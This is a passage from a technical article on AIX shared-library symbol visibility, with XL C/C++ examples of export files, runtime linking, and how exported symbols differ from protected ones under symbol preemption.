The distinction between export and hidden is obvious. However, the distinction between export and protected is subtle. We will continue the discussion of symbol preemption, with a better description, in the next section.
Anyway, the above four keywords are available in the export file. Appending one of them (separated by a blank) to the tail of a symbol provides finer-grained control of symbol visibility. In this case, we can specify symbol visibility (on AIX 6.1 and later versions) as shown below:
func1__Fi export func0__Fv hidden myintvar hidden
This informs the linker that only
func1__Fi(that is,
func1) will be exported, and others will not be exported.
You may notice that, unlike the GNU export map, the symbols listed in the export file are all mangled names. Mangled names do not look so friendly because the programmer may not be aware of the rule of mangling. But, it does help the linker to quickly do name resolution. To close this gap, the AIX OS chooses to utilize a tool to help programmer.
To be short, if the programmer specifies the
-qmkshrobj option while invoking the XL C/C++ compiler, the compiler driver invokes the
CreateExportList tool to generate the export file that holds the names of the mangled symbols automatically, after the compiler successfully generates the object file. The compiler driver then passes the export file to the linker to process the symbol visibility setting. Considering this example, if we invoke:
$ xlC -qpic a.C -qmkshrobj -o libtest.a
The libtest.a library is generated with all the symbols exported (this is default). Though it does not achieve our goal, at least the whole process looks transparent to the programmer. And, the programmer can also choose to use the
CreateExportList utility to generate the export file instead. If you choose this way, you are now able to modify the export file manually. For example, suppose the export file name you want is exportfile, then
qexpfile=exportfile is the option you need to pass to the XL C/C++ compiler driver.
$ xlC -qmkshrobj -o libtest.a a.o -qexpfile=exportfile
In this case, you can find out all the symbols as shown below:
func0__Fv func1__Fi myintvar
Based on our requirement, we can either simply remove lines with the
myintvar,
func0, or append the
hidden visibility keyword after them, and then save the export file and use the linker option
-bE:exportfile to pass the refined export file back.
$ xlC -qmkshrobj -o libtest.a a.o -bE:exportfile
That would finalize all the steps. Now the generated DSO will not have
func1__Fi(that is,
func1) exported:
$ dump -Tv libtest.a ***Loader Symbol Table Information*** [Index] Value Scn IMEX Sclass Type IMPid Name [0] 0x20000284 .data EXP DS SECdef [noIMid] func1__Fi
Alternatively, the programmer can also use the
CreateExportList utility to explicitly generate the export file as shown below:
$ CreateExportList exportfile a.o
In our case, it works exactly as the one above.
For the new format on AIX 6.1 and later versions, appending the keyword for symbol visibility one by one might require more effort. However, the XL C/C++ compiler is planning to make some changes to make life easier for programmer. (Related information will be provided in the next part in this series.)
In the export list solution, all the information is kept in the export list and programmers do not need to change the source file. It separates the work of code development and library development. However, we might face an issue with such a process. As we keep the source file unmodified, the binary code compiler generated might not be optimal. The compiler misses the chance to optimize symbols that are not exported due to lack of information. It would either increase the binary size generated or slow down the process of symbol resolution. However, this is not a major issue for most of the applications.
The following table compares all the above solutions and makes the view centralized.
Table 1. Comparison of each solution
Symbol preemption
As we mentioned above, there is a subtle distinction between the visibility keywords
export and
protected. And the subtle distinction is about symbol preemption. Symbol preemption occurs when the symbol address resolved at link time is replaced with another symbol address resolved at runtime (notice that runtime linking is optional on AIX though). Conceptually, runtime linking would resolve undefined and non-deferred symbols in shared modules after the program execution has begun. It is a mechanism for providing runtime definitions (these function definitions are not available at link time) and symbol rebinding capabilities. On AIX, when the main program is linked with the
-brtl flag or when preloaded libraries are specified with the
LDR_CNTRL environment variable, the program is able to use the runtime linking facility. Compiling with
-brtl adds a reference to the dynamic linker to the program, which will be called by the program's startup code (/lib/crt0.o) when the program begins to run. Shared object input files are listed as dependents in the program loader section in the same order as they are specified in the command line. When the program begins to run, the system loader loads these shared objects so that their definitions are available to the dynamic linker.
Thus, the functionality of redefining the items in shared objects at runtime is called symbol preemption. Symbol preemption is only possible on AIX when runtime linking is used. Imports bound to a module at link time can be rebound to another module at runtime. Whether a local definition can be preempted by an imported instance depends on the way the module was linked. However, a non-exported symbol can never be preempted at runtime. When the runtime loader loads a component, all the symbols within the component that have the default visibility are subject to preemption by symbols of the same name in components that are already loaded. Note that because the main program image is always loaded first, none of the symbols defined by it will be preempted (redefined).
A protected symbol is exported, but it is not preemptible. In contrast, an exported symbol is exported and can be preempted (if runtime linking is used).
For default symbols, there is a difference between Linux® and AIX. The GNU compilers and ELF file format define a default visibility, which is used for symbols that are exported and preemptible. This is similar to the exported visibility defined on AIX.
The following code takes the AIX platform as an example.
Listing 3. func.C
#include <stdio.h> void func_DEFAULT(){ printf("func_DEFAULT in the shared library, Not preempted\n"); } void func_PROC(){ printf("func_PROC in the shared library, Not preempted\n"); }
Listing 4. invoke.C
extern void func_DEFAULT(); extern void func_PROC(); void invoke(){ func_DEFAULT(); func_PROC(); }
Listing 5. main.C
#include <stdio.h> extern void func_DEFAULT(); extern void func_PROC(); extern void invoke(); int main(){ invoke(); return 0; } void func_DEFAULT(){ printf("func_DEFAULT redefined in main program, Preempted ==> EXP\n"); } void func_PROC(){ printf("func_PROC redefined in main program, Preempted ==> EXP\n"); }
In the above description, we defined
func_DEFAULT and
func_PROC both in func.C and main.C. They have the same names but with different behaviors. A function
invoke from invoke.C will call
func_DEFAULT and
func_PROC in sequence. We will use the following exportlist code to see if symbols are exported and how they are exported.
Listing 6. exportlist
func_DEFAULT__Fv export func_PROC__Fv protected invoke__Fv
If you are using the linker version before to AIX 6.1, you may use a blank space instead of
export, and the
symbolic keyword instead of the
protected keyword. The command for building the libtest.so library and the main executable are listed in the following code:
/* generate position-independent code suitable for use in shared libraries. */ $ xlC -c func.C invoke.C -qpic /* generate shared library, exportlist is used to control symbol visibility */ $ xlC -G -o libtest.so func.o invoke.o -bE:exportlist $ xlC -c main.C /* -brtl enable runtime linkage. */ $ xlC main.o -L. -ltest -brtl -bexpall -o main
Basically, we construct libtest.so from func.o and invoke.o. We use
exportlist to set
func_DEFAULT from func.C and
func_PROC from func.C as exported symbols, but still protected. Thus libtest.so has two exported symbols and one protected symbol. For the main program, we export all the symbols from main.C, but link it to libtest.so. Notice that we use the
-brtl flag to enable dynamic linking for libtest.so.
The next step is to invoke the main program.
$ ./main func_DEFAULT redefined in main program, Preempted ==> EXP func_PROC in the shared library, Not preempted
Here we see something interesting:
func_DEFAULT is the version from main.C, while
func_PROC is the version from libtest.so (func.C). The
func_DEFAULT symbol is preempted because the local version (we say it is local because the calling function invoke is from invoke.C, which is basically in the same module with
func_DEFAULT from func.C) from libtest.so is replaced by the one from another module. However, same condition does happen on
func_PROC, which is specified as protected visibility in the export file.
Notice that the symbol that can preempt others should always be exported. Suppose we remove the
-bexpall option while building the executable main, the output is as shown below:
$ xlC main.o -L. -ltest -brtl -o main; //-brtl enable runtime linkage. $ ./main func_DEFAULT in the shared library, Not preempted func_PROC in the shared library, Not preempted
Here no preemption happens. All the symbols are kept as same version in module.
In fact, to check if a symbol is exported or even protected at runtime, we can make use of the
dump utility:
$ dump -TRv libtest.so libtest.so: ***Loader Section*** ***Loader Symbol Table Information*** [Index] Value Scn IMEX Sclass Type IMPid Name [0] 0x00000000 undef IMP DS EXTref libc.a(shr.o) printf [1] 0x2000040c .data EXP DS SECdef [noIMid] func_DEFAULT__Fv [2] 0x20000418 .data EXP DS SECdef [noIMid] func_PROC__Fv [3] 0x20000424 .data EXP DS SECdef [noIMid] invoke__Fv ***Relocation Information*** Vaddr Symndx Type Relsect Name 0x2000040c 0x00000000 Pos_Rel 0x0002 .text 0x20000410 0x00000001 Pos_Rel 0x0002 .data 0x20000418 0x00000000 Pos_Rel 0x0002 .text 0x2000041c 0x00000001 Pos_Rel 0x0002 .data 0x20000424 0x00000000 Pos_Rel 0x0002 .text 0x20000428 0x00000001 Pos_Rel 0x0002 .data 0x20000430 0x00000000 Pos_Rel 0x0002 .text 0x20000434 0x00000003 Pos_Rel 0x0002 printf 0x20000438 0x00000004 Pos_Rel 0x0002 func_DEFAULT__Fv 0x2000043c 0x00000006 Pos_Rel 0x0002 invoke__Fv
This is the output from libtest.so. We may find that
func_DEFAULT__Fv and
func_PROC__Fv are all exported. However,
func_PROC__Fv does not have any relocations. It means that the loader may not be able to find a way to replace the address of
func_PROC from TOC table. And the address of
func_PROC in TOC table is where the function invokes transfer control to. Therefore,
func_PROC does not appear to be preempted. We then realize that it is protected.
Symbol preemption is rarely used in fact. However, it leaves a possibility that people replace the symbol dynamically at run time but also leave some security holes. If you do not want key symbols in your library to be preempted (but still need to export it for use), you need to make it protected for safety.
Acknowledgments
We would like to thank Dr. Jinsong Ji for reviewing and providing valuble suggestions on this article.
Resources
- Get basic visibility concept from the GCC wiki. It also explains why visibility is useful and how to use the visibility attribute.
- Get to know how to work with GNU export maps, which enable GNU linker to properly set symbol visibility at linking time.
- Get to know the basic concept of Library on wiki, and some related concepts involved.
- Formal introduction to Symbols from the IBM AIX documentation.
- Formal introduction to Shared library and shared memory from the IBM AIX 6.1 documentation
- Details about the ld command from the IBM AIX 6.1 documentation.
- Individual option description of -brtl from the IBM AIX 6.1 documentation.
- Accurate definition of Symbol Visibility from the IBM AIX 6.1 documentation.. | https://www.ibm.com/developerworks/aix/library/au-aix-symbol-visibility/ | CC-MAIN-2016-30 | refinedweb | 4,194 | 56.25 |
AvgPool2D: How to Incorporate Average pooling into a PyTorch Neural Network
AvgPool2D - Use the PyTorch AvgPool2D Module to incorporate average pooling into a PyTorch neural network
< > Code:
Transcript:
It is common practice to use either max pooling or average pooling at the end of a neural network but before the output layer in order to reduce the features to a smaller, summarized form.
Max pooling strips away all information of the specified kernel except for the strongest signal.
Average pooling summarizes the signal in the kernel to a single average.
The displayed example network
import torch.nn as nn.avg_pool("AvgPool1", nn.AvgPool2D(kernel_size=4, stride=4, padding=0, ceil_mode=False, count_include_pad=False)) self.fully_connected = nn.Linear(32 * 4 * 4, num_classes) def forward(self, x): y = x.clone() x = self.layer1(x) x = self.layer2(x) x = self.avg_pool(x) x = x.view(-1, 32 * 4 * 4) x = self.fully_connected(x) return x
uses the AvgPool2D function
self.avg_pool("AvgPool1", nn.AvgPool2D(kernel_size=4, stride=4, padding=0, ceil_mode=False, count_include_pad=False))
to perform average pooling on the output of the second convolutional layer.
The kernel size argument
kernel_size=4
is required and determines how large of an area the average pooling has taken over.
I chose 4 because it evenly divides the height and width of the output of the Conv2d layer above it which is 16x16.
The stride
stride=4
can be specified as smaller or larger than the kernel size but having it be equal to the kernel size ensures that there is no overlap in the output averages, as is the case if the stride is less than the kernel size, and then no values are skipped over as is the case if the stride is greater than the kernel size.
This value defaults to kernel size.
Padding
padding=0
is the implicit zero padding to be added to the edges of the inputs before calculation.
This can be useful if your kernel size does not evenly divide the height and width of the input features.
This will default to zero.
Average pooling needs to compute a new output shape.
This is usually calculated using a formula
ceil_mode=False
involving the kernel size, stride, padding, and shape of the inputs, then taking the floor of that calculation.
This can be changed to the ceiling by setting ceil_mode=True.
count_include_pad
count_include_pad=False
becomes relevant if you have added implicit zero padding.
In that case, setting count_include_pad to true will instruct avg_pool to include the zero padding when calculating its averages.
After the average pool layer is set up, we simply need to add it to our forward method.
x = self.avg_pool(x)
One last thing, the input dimensions of the fully connected output layer need to be changed to match average pool as average pool changes the shape of layer2’s outputs.
self.fully_connected = nn.Linear(32 * 4 * 4, num_classes)
The input dimension is now 32x4x4 because average pool has reduced the height and width of each feature map to 4.
This needs to also be updated in the view function so it is opening tensors to the desired shape.
x = x.view(-1, 32 * 4 * 4) | https://aiworkbox.com/lessons/avgpool2d-how-to-incorporate-average-pooling-into-a-pytorch-neural-network | CC-MAIN-2020-40 | refinedweb | 530 | 55.74 |
The project is currently up on Github.
I will let them describe it in their own words:. implement the full Flash display system.
And:
Features:
Native Performance
- Using “unsafe” code.
- Direct interop with native code (Cocos2D-X, other C++ based engines such as Page44, etc).
- Optimized compiler for JavaScript generation.
- Optional full C++ target with minimal app size and startup overhead.
Advanced Tools Support
- Complete tool support including Syntax Highlighting and intellisense in the MonoDevelop IDE.
- Source Debugging on all platforms (FlashBuilder for Flash).
- Fast Release mode compiles and rapid iteration.
Full Platform API’s
- Complete iOS platform API via Xamarin MonoTouch and Mono for Android
- Complete Windows/MacOSX API’s.
- Complete integration with UI builder (iOS), and Android GUI builder via Xamarin Studio.
Differences between PlayScript and ActionScript
- PlayScript supports most features of C# 5.
- PlayScript requires semicolons after all statements.
- PlayScript uses block scoping for variables.
- PlayScript requires breaks in switch statements.
- PlayScript supports generics using the .<> syntax introduced in AS3 with the normal C# feature set.
- PlayScript supports properties using the “property” keyword with syntax similar to C#.
- PlayScript supports indexers and operator overloads using the “indexer” and “operator” keywords.
- PlayScript implements AS3 namespaces by converting them to .NET internal.
Differences between PlayScript and CSharp
- PlayScript requires the use of the “overload” keyword on addtional overload methods (allows more readable JavaScript code by only mangling overload method names).
- PlayScript does not support using blocks.
- PlayScript does not support checked, unchecked.
- PlayScript does not “presently” support unsafe code (though this will be added in the future). Currently unsafe code can be added to mobile projects via C#.
- In PlayScript you may not directly access the base properties of Object (ToString(), GetType(), GetHashCode()) unless you cast an objet to a System.Object. Doing this however will make your code incompatible with the C++ or JavaScript target backends.
The provided the following example code:
// public static operator - (i:int, j:int):int { } // Indexers public indexer this (index:int) { get { return _a[index]; } set { _a[index] = value; } } // Generics public class Foo.<T> { public var _f:T; public function foo<T>(v:T):void { } } // Async async function AccessTheWebAsync():Task.<int> { var client:HttpClient= new HttpClient(); var getStringTask:Task.<String> = client.GetStringAsync(""); var urlContents:String = await getStringTask; return urlContents.Length; }
Very interesting. So basically they are making a HaXe like cross platform tool based on a hybrid of ActionScript and C#, targeting existing Stage3D libraries.
News Programming | https://gamefromscratch.com/zynga-release-playscript-a-c-5-actionscript-hybrid-that-targets-the-mono-runtime/ | CC-MAIN-2021-04 | refinedweb | 404 | 60.21 |
Topic talk:Topics
From Wikiversity
Topic:Topics is a discussion of Topic:Topics which is a learning project to classify all Topic:topic pages on Wikiversity. There is a similar project at Portal:Portals. CQ 01:26, 2 November 2006 (UTC)
[edit] New topic template
I've changed the {{topic}} template:
[[Topic:{{{1}}}|{{{1}}}]] ([[wikt:{{{1}}}|wiktionary]] | [[w:{{{1}}}|wikipedia]] | [[b:{{{1}}}|wikibooks]])
Using {{topic|<some topic>}} produces links to wiktionary entries, wikipedia articles and wikibooks items with the same name. To increase the interoperability of page names, use only initial capitals as a general rule. You may have to follow the links produced to create redirects if necessary. The idea is to interlink the Topic: namespace with other Wikimedia projects. CQ 01:04, 1 June 2007 (UTC)
- There is Special:random/topic. Is it not good enough? Hillgentleman|Talk 04:39, 2 June 2007 (UTC) | http://en.wikiversity.org/wiki/Topic_talk:Topics | crawl-002 | refinedweb | 146 | 57.37 |
.)
Sorry. I don't understand well your tables.
Are you proposing a fixed percentage investment over GDP?
One of the problems of the PV expansion is that takes time. The infrastructure (factories) grows exponentialy, but at manageable percentage.
For example, taking the BP data (see my old discussion in the other post) now renewable is growing at 15%, while PV is growing at 32%.
Perhaps renewable could grow slightly faster, but it's not realistic to expect over 50% growth at worldwide scale when the numbers are not very small.
So the PV deployment speed is mainly driven by inteslf, not GDP.
Perhaps, only, if this energy trap reach the numbers of PV growth, then they could limit the PV expansion.
More things. Although I think that the Hubbert curve of your assumption is realistic, it would be interesting to try a pessimistic one to check the results in a "very bad, near worst scenario", like a Seneca cliff. The Seneca cliff is becoming popular on peak oil movement (you know... always expecting the worst), but there is reasons to admit as a valid scenario altough not the most probable.
Last, I didn't find the Phyton code. Do you linked it?
Hi Oatleg,
"One of the problems of the PV expansion is that takes time. The infrastructure (factories) grows exponentialy, but at manageable percentage."
I include a 7-year delay in the simulation for the amount of time necessary to realize FF production has peaked and to ramp up PV factories. This number is adjustable.
"it would be interesting to try a pessimistic one to check the results in a "very bad, near worst scenario", like a Seneca cliff. The Seneca cliff is becoming popular on peak oil movement"
I am already making extremely pessimistic assumptions for rates of decline. Using the assumptions I've made, all fossil fuels decline by half in 34 years. That decline is at least twice as fast as any that would actually occur.
I just don't see any reason at all why FF production would follow a Seneca cliff. Statistically, it just doesn't make any sense. Presumably, the reason FF production follows a bell curve is because discoveries are normally distributed. As a result, there is just no chance that all fossil fuel production from all wells (gas and oil) in all fields would be synchronized, and all drop off a cliff at the same time. That is like flipping coins and getting heads a million times in a row. The chances of that are so close to being zero that I don't think it's a serious possibility.
Hi oatleg,
"Sorry. I don't understand well your tables. Are you proposing a fixed percentage investment over GDP?"
No. The numbers are fractions of 1, where 1 is the original gross energy available. So a value of 0.05 for "invest_pv" means that 5% of initial energy is invested in building PV panels that year.
Hi Tom,
I would be interested to see the source code of your program, but a few thoughts spring to mind:
Your table shows (I think) that a 0.05 energy investment in PV would yield an immediate 0.0167 return in energy each year. That doesn’t seem right to me, given that most of the energy for PV is invested up-front. If we accept an EROEI of 5 for PV (some will think this harsh, some generous), then we can expect that a 0.05 energy investment to pay off as 0.25 units of energy over the lifetime (25 years [1]) of the system. This would imply 0.01 annual energy units per year return on the 0.05 annual energy unit investment. This is also an overestimate of the energy return, because such a huge increase in renewables production would also require a commensurate increase in manufacturing capacity — we would not just be building more PV panels and turbines, but more factories, supply chains, mining equipment, etc — all of which would be an up-front energy cost.
That’s the most glaring technical problem I can see, the other problems are of a systems nature. You assume that you can change fuel availability in such a significant way, but that nothing else will change — this is an error.
The first problem I can see, is that the reduction in availability would be mostly borne by the developed world. What might be a 6% global energy deficit, would be more like 15% in the developed world (which uses about 40% of global energy). This is because developing countries derive more value from their (much smaller) energy spending, and hence can out-bid developed countries for the limited supplies that were available (this process is already underway: the energy consumption of the developed world is decreasing).
Clearly, the developed world would not tolerate a 15% reduction in its liquid fuel supply, so we would likely see a marked increase in conflict. This would lead to a reduction in global trade, and reduced investment, which would negatively affect the roll-out of renewable energy.
This is a thought-experiment only, not a prediction. I’m just thinking about how global systems might react to a decrease in energy supply of “only” 6%. The point is to illustrate that it is not reasonable to expect no flow-on effects of sharply decreasing energy supplies.
Cheers, Angus
[1] I realise that a solar PV system will still work after 25 years, but this is typically the lifetime that is assumed when working out the stats
Hi Angus,
"That doesn’t seem right to me, given that most of the energy for PV is invested up-front. If we accept an EROEI of 5 for PV ... then we can expect that a 0.05 energy investment to pay off as 0.25 units of energy over the lifetime (25 years [1]) of the system. This would imply 0.01 annual energy units per year return..."
I assume an ERoEI of 10 and a lifetime of 30 years. The formula (0.05*10)/30 = 0.0167
I assume that PV has an ERoEI of 10. That is well below what is indicated in the most recent studies published. It is also below the studies cited by the National Renewable Energy Labratory:
Those studies are more than 15 years old and so are almost certainly an underestimate of PV ERoEI, since ERoEI has been improving.
I do not wish to cherry-pick the few EROI studies produced by what appears to be a doomsday group. There are only two recent studies showing PV with an ERoEI lower than 5, but those are extreme outliers and have serious problems. I'm using a figure which is representative of the results that researchers generally obtain.
"we would not just be building more PV panels and turbines, but more factories, supply chains, mining equipment, etc — all of which would be an up-front energy cost."
Most ERoEI studies include energy costs of mining, installation, and so on. Perhaps they don't include the energy cost of building the mining equipment and factories. However, if fossil fuels peaked and we started transitioning to renewables, we could STOP investing so much energy in new gas pipelines, new coal rail lines, new factories for turbines, and so on. These are upfront costs for ALL sources of energy.
It's not possible to find reliable information on this, because nobody does ERoEI studies which are so detailed that they include the energy cost of building mining equipment or trains. However, with both fossil fuels and PV, things like that are an upfront investment in both cases, and there is no a priori reason to assume that PV requires more transportation or mining equipment than coal (perhaps less, since PV panels are transported only once during their lifetime).
"You assume that you can change fuel availability in such a significant way, but that nothing else will change — this is an error. "
I do not assume that. There would be all kinds of changes in the economy right away. The economy would sacrifice the LEAST important uses of energy first. It would suddenly become expensive to blast your air conditioner all day long.
However, that's just beside the point. It is not relevant to the "energy trap".
"The first problem I can see, is that the reduction in availability would be mostly borne by the developed world. What might be a 6% global energy deficit, would be more like 15% in the developed world (which uses about 40% of global energy). "
If you exclude oil, the vast majority of energy worldwide is from domestic sources. The United States gets almost all its coal and gas from its own territory, and so does China, India, and most other places.
When talking about the energy trap, we are dealing with the energy used to BUILD renewables. That energy is overwhelmingly thermal energy and electricity which would come from coal and gas at the beginning, not from oil.
...Obviously, we could envision all kinds of political possibilities here. Perhaps that decline of 6% for one year would cause President Trump to go crazy and nuke somebody. Maybe there would be panic, chaos. I have no way of predicting those things. However, it is a separate issue from the energy trap. The trap itself is overcome easily enough by basic, automatic market mechanisms.
> I assume that PV has an ERoEI of 10.
...Overbuilt to keep production constant year-round, and with 7 days of battery back-up?
"...Overbuilt to keep production constant year-round, and with 7 days of battery back-up?"
No. In an energy trap, I think we would use fossil fuel plants in a load following manner. Even coal plants can be used in that way, to some extent. I don't think there would be any overbuilding or battery back-up until renewable penetration reached a certain level (perhaps 20%), at which point we'd already be well out of the energy trap.
Here is the python source code.
(NOTE: I replaced tabs with dollar signs, which you can revert by typing "cat yourFileName.py|tr '$' '\t > yourNewFileName.py'" on a Mac command line, or you can do it manually in a text editor. I had to replace tabs with dollar signs because white space is important in python but there is no way to include tabs in a blogger comment. You can run the source code by installing python and typing 'python yourFileName.py' at a command prompt).
The code is as follows:
#.
import math
#
# You can change these parameters
#
eroei_pv = 10.0
eroei_ff = 15.0
run_years = 30
# Number of years before a PV plant expires
pv_lifetime = 30
# The standard deviation of the Gaussian decline curve
std_dev = 30
# The fraction of FF energy investment which is a recurring cost instead of an
# upfront cost for building FF power plants. Even fossil fuel plants require
# SOME upfront cost, which will cease when FF start declining
fraction_ff_invest_operating = 0.9
# How many rows to print; one every n years
print_every_n_year=1
# How many years before decision-makers discover that FF are on a permanent
# decline so don't invest in new FF plants and start investing in PV
figure_out_year=7
#
# Do not change these
#
orig_net_ff = 1.0 - (1.0/eroei_ff)
invest_pv = 0.0 # initial PV investment is 0
gross_ff = 1.0 # initial FF amount extracted is 1
gross_total = 1.0
old_pv_investments=[] # This is used to keep track of and remove PV panels which have expired due to age
def gaussian_curve(num, std_dev):
$return math.exp(-(math.pow(num, 2))/(2*math.pow(std_dev, 2)))
# Print table header
print "year gross_ff gross_pv gross_total net_total invest_pv invest_ff fraction_original_net"
for year in range(0,run_years):
$gross_ff = gaussian_curve(float(year), std_dev)
$# After it's discovered that FF are on a permanent decline, stop investing
$# so much in new FF plants and extraction
$if (year < figure_out_year):
$$invest_ff = 1.0 / eroei_ff
$else:
$$invest_ff = (gross_ff / eroei_ff) * fraction_ff_invest_operating
$# After it's discovered that FF are on a permanent decline, start investing
$# in PV
$if (year > figure_out_year):
$$if (year < std_dev):
$$$invest_pv = (1.0 / eroei_pv) / 2.0
$$else:
$$$invest_pv = (1.0 / eroei_pv)
$# Old PV panels are expired after pv_lifetime
$old_pv_investments.insert(0,invest_pv)
$if (len(old_pv_investments) > pv_lifetime):
$$old_pv_investments.pop()
$# Add up all PV contribution from all panels in the last n years which
$# are still operating
$gross_pv = 0.0
$for old_pv_inv in old_pv_investments:
$$# PV panels generate this much each year
$$gross_pv += old_pv_inv * eroei_pv / pv_lifetime
$# Sum totals
$gross_total = gross_ff + gross_pv
$net_total = gross_total - invest_ff - invest_pv
$# Print chart
$if (year % print_every_n_year == 0):
$$print "%2d %9.4f %9.4f %9.4f %9.4f %9.4f %9.4f %9.4f" \
$$$% (year, gross_ff, gross_pv, gross_total, net_total, \
$$$$invest_pv, invest_ff, (net_total/orig_net_ff)) | http://bountifulenergy.blogspot.com/2016/07/the-energy-trap.html | CC-MAIN-2017-17 | refinedweb | 2,126 | 63.7 |
AxKit::App::TABOO::Data::Comment - Comment Data object for TABOO
use AxKit::App::TABOO::Data::Comment; $comment = AxKit::App::TABOO::Data::Comment->new(); $comment->load(limit => {sectionid => $self->{section}, storyname => $self->{storyname}}); $comment->tree; $comment->adduserinfo; $timestamp = $comment->timestamp();
This Data class contains a comment, which may be posted by any registered user of the site. Each object will also contain an identifier of replies to the comment, that may be replaced with a reference to another comment object.
This class implements several methods, reimplements the load method, but inherits some from AxKit::App::TABOO::Data.
new($self-dbconnectargs())>
The constructor. Nothing special.
load(what => fields, limit => {key => value, [...]}
The load method is not reimplemented but needs elaboration. It follows the convention of the load methods of the parent class, but to uniquely identify a comment, one has to set certain
limits.
First one should identify the story that the comment is attached to, by giving
storyname and
sectionid, see AxKit::App::TABOO::Data::Story for details.
To identify the comment itself, TABOO introduces the concept of a commentpath. A commentpath is a string that identifies a comment by appending the username of the poster for each reply posted, separated by a
/. In computer science terms, I think this is known as a trie. Thus, commentpaths will grow as people respond to each other's comments. For example, if user bar replies to user foo, the commentpath to bar's comment will be
/foo/bar. The commenpath will typically be in the URI of a comment. If the same user post more replies to a comment, they will be suffixed with e.g.
_2 for the second comment.
The
commentpath,
sectionid and
storyname together identifies a comment.
adduserinfo()
When data has been loaded into an object of this class, it will contain a string only identifying the user who posted the comment. This method will replace that strings with a reference to a AxKit::App::TABOO::Data::User-object, containing the needed user information.
reply($comment)
This method can be used to attach a reply to a comment, or to retrieve a reply. If no argument is given, it will return the reply object if it exists. To attach a comment, give an argument which is an instance of this class or an instance of AxKit::App::TABOO::Data::Plurals::Comments.
tree([$what, $orderby])
This method has changed considerably since earlier releases. You may call it on any object of this class that has
commentpath,
sectionid and
storyname defined. It will return an instance of the AxKit::App::TABOO::Data::Plurals::Comments class consisting of all comments in the tree with the comment in the object it was called on as root.
timestamp([($sectionid, $storyname, $commentpath)|Time::Piece])
The timestamp method will retrieve or set the timestamp of the comment. If the timestamp has been loaded earlier from the data storage (for example by the load method), you need not supply any arguments. If the timestamp is not available, you must supply the sectionid, storyname and commentpath identifiers, the method will then load it into the data structure first.
The timestamp method will return a Time::Piece object with the requested time information.
To set the timestamp, you must supply a Time::Piece object, the timestamp is set to the time given by that object. for example just want the title of the comments, not all their content.
These are the names of the stored data of this class:
timestamp()method.
The
write_xml() method, implemented in the parent class, can be used to create an XML representation of the data in the object. The above names will be used as element names. The
xmlelement() and
xmlns() methods can be used to set the name of the root element and the namespace respectively. Usually, it doesn't make sense to change the defaults, which are
reply
replyshould check the class of the object it is passed.
See AxKit::App::TABOO. | http://search.cpan.org/dist/AxKit-App-TABOO/lib/AxKit/App/TABOO/Data/Comment.pm | crawl-003 | refinedweb | 659 | 54.63 |
From: Vladimir Prus (ghost_at_[hidden])
Date: 2003-12-16 02:45:26
David Abrahams wrote:
> > 1. You declare builtin called 'set.difference'.
>
> You could call it anything.
>
> > 2. Insides the 'set' module, you put
> >
> > IMPORT : set.difference : $(_name) : difference : localize ;
> > EXPORT set : difference ;
> >
> > 3. After 'set.jam' is read, the 'difference' rule is exported into global
> > scope, and now 'set.difference' behaves as rule declared in 'set', but is
> > in fact implemented in 'C'
>
> Yep.
>
> > The good thing about the proposal is that it does not require a new
> > builtin.
>
> You mean _my_ proposal?
Yes.
> > The only thing I don't like is cluttering the global namespace.
> > After all, the implementation -- the .c files declaring new rules -- is
> > better live in separate files in 'modules' directory, as builtins.c is
> > large enough already. It's nicer if namespaces follow that layout, though
> > it's not critical.
>
> It should be very easy to get builtin rule declarations to go into a
> specific module. You could even do it by searching for "." in the
> name.
Interesting. In this case one would not need the IMPORT/EXPORT stuff at all,
right?.
This is usefull for trying both alternatives and understanding how much
speedup we get. Or we might even make NATIVE_RULE do nothing when
native rule is not available, which would Boost.Build work with several bjam
version, not necessary the latest. And finally, if you introduce builtin and
remove jam version of the rule, you don't have a place where to put
docstring.
I'm not sure either argument is a killer one, | https://lists.boost.org/boost-build/2003/12/5406.php | CC-MAIN-2019-30 | refinedweb | 262 | 69.07 |
Contents
Contents
Jython 2.3
Builtins
yield is always a keyword. [done]
enumerate() built-in added. [done]
int() will now return a long instead of raising OverflowError if a number is too large.
built-in types support extending slicing syntax.
list.insert() changed to be consistent with negative slice indexing. [done]
list.index() takes optional start, stop arguments. [done]
Dictionaries gained a pop() method and .fromkeys() class method. [done]
dict() constructor takes keyword arguments. [done. also applied in 2.2]
assert no longer checks debug flag.
Many type objects are now callable. [possibly done]
PEPs
PEP 218: A Standard Set Datatype
PEP 263: Defining Python Source Code Encodings
PEP 273: Importing Modules from Zip Archives [done]
PEP 278: Universal Newline Support [done]
PEP 307: Pickle Enhancements
Reference: What's New in Python 2.3
Jython 2.4
Built-in set, frozenset
Unifying int/long
Generator expressions
Function/method decorators
Multi-line imports
Reference: What's New in Python 2.4
Jython 2.5
Conditional expressions
'with' statement
Absolute & relative imports
Unified try/except/finally
New generator features
Exceptions as new-style classes
The index method
Reference: What's New in Python 2.5
Replace jythonc
j. See for the general idea.
Solidify Import System
Jython adds to Python's import system to handle loading from Java's classpath and to load from jar files. It's not exactly clear what modifications are in place and what techniques are best for adding jar files to the path at runtime and things like that. An informational JEP explaining what's been added and how things relate to both the Python and Jython sides would be nice.
Brett Cannon has been working on rewriting all of Python's import machinery in Python; see for the code.
Complete Java to Python naming integration
Java allows a method and field of the same name to exist in the same class. Python only has a single namespace for these items. This leads to methods being hidden in a Java instance in Jython if the instance has a field of the same name. In addition, the bean convenience methods that map object.getField() in Java to object.field in Jython lead to collisions. See and. A standard system for renaming fields and methods to avoid collisions and a JEP explaining the whole thing would be most welcome. | https://wiki.python.org/jython/BiggerTasks?action=diff | CC-MAIN-2016-40 | refinedweb | 390 | 68.06 |
Opened 3 years ago
Closed 3 years ago
#21341 closed New feature (fixed)
Clean way of making https requests with test client
Description
This is the current way of making an https request with the testing client:
from django.test import Client client = Client() client.get('/', {'wsgi.url_scheme': 'https'})
This is quite obscure and undocumented, something like
client.get('/', secure=True)
would be far cleaner. The way
django.test.client.Client
and
django.test.client.RequestFactory
are build, we would need to modify each request method in both of them.
Change History
This looks pretty good to me. I left a few comments on the pull request. I'm marking as RFC anyway because these comments are minor and could be made by the committer.
comment:9 Changed 3 years ago by
Thanks for the review, suggestions applied!
comment:10 Changed 3 years ago by
In: 99b681e227b5b7880d6edd0d8dd670034d431859
Fixed #21341 -- Eased https requests with the test client
PR sent:
All the request methods of django.test.client.Client receive a secure
argument that defaults to False indicating wether or not to make the
request through https. | https://code.djangoproject.com/ticket/21341 | CC-MAIN-2016-44 | refinedweb | 185 | 75.3 |
